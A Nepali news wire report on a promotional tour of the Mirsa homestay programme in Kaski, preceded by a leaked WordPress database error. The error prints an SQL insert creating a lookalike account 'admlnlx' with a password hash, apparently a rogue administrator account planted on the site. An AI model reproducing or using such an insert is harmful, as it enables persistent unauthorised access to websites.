WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bzqbx31S4cju62gzeeMuSCke8z6MkA1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-23 20:50:14', '', 'admlnlx', 'admlnlx')
पोखरा,माघ ४ –
कास्कीको पर्यटकीय गाउँ मिर्सामा सञ्चालित घरवास कार्यक्रमलाई अभिप्रेरित गर्न परिचयात्मक भ्रमण कार्यक्रम सम्पन्न भएको छ ।
गाउँ पर्यटन प्रवद्र्धन मञ्च नेपाल कास्कीको आयोजना एवम् नेपाल पर्यटन बोर्ड, पोखराको प्रवद्र्धनमा उक्त भ्रमण कार्यक्रम सम्पन्न भएको हो । पर्यटन सम्बद्ध संस्थाका प्रतिनिधि तथा सञ्चारकर्मीसहितको टोलीले मिर्सा गाउँमा सञ्चालित घरवास कार्यक्रमको अवलोकन गरेको थियो ।
गाउँ पर्यटन प्रवद्र्धन मञ्चका जिल्ला अध्यक्ष तारानाथ पहारीले घरवास कार्यक्रमको प्रभावकारिताका लागि स्थानीय समुदायले देखाएको सक्रियता प्रशंसायोग्य भएको बताउनुभयो । नेपाल पर्यटन बोर्ड, पोखराका वरिष्ठ अधिकृत सूर्य थपलियाले पर्यटनमा नयाँ अवधारणाका साथ २०६७ सालदेखि घरवास कार्यक्रम सुरु भएको जानकारी दिनुभयो ।
मिर्सा घरवास कार्यक्रम व्यवस्थापन समितिका अध्यक्ष बुद्धीकुमारी गुरुङका अनुसार १७ वटा घरमा सञ्चालन भएको घरवास कार्यक्रम प्रभावकारी बन्दै गएको बताउनुभयो । – रासस